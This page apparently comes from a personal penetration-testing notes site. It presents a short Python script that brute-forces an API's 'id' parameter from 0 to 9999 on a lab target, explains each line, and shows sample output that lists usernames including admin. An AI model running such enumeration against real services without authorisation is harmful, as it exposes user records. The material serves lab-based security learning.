PARAM-FUZZER.PY

this is a script that automate the enumeration of valid parameter values
root@oco:~$ nano parameterFuzzer.py
import requests, sys

def brute():
    try:
        value = range(10000)
        for val in value:
            url = sys.argv[1]
            r = requests.get(url + '/?id='+str(val))
            if "position" in r.text:
                print("Number found!", val)
                print(r.text)
    except IndexError:
        print("Enter a URL E.g.: http://<TARGET IP>:3003/")

brute()

 * the requests modules is used to make HTTP requests (GET, POST, etc.)
 * the sys module allows is used to parse system arguments.
 * the url = sys.argv[1] receives the first argument.
 * the r = requests.get(url + '/?id='+str(val)) creates a response object called r 
   which will allow us to get the response of our GET request. We are just appending
   /?id= to our request and then val follows, which will have a value in the specified 
   range.
 * the if "position" in r.text: looks for the position string in the response. If we 
   enter a valid ID, it will return the position and other information. If we don't, 
   it will return [].
   
root@oco:$ python3 brute_api.py http://<TARGET IP>:3003
 Number found! 1
 [{"id":"1","username":"admin","position":"1"}]
 Number found! 2
 [{"id":"2","username":"HTB-User-John","position":"2"}]
 ...
PreviousPYTHON NextBASH
Last updated 1 month ago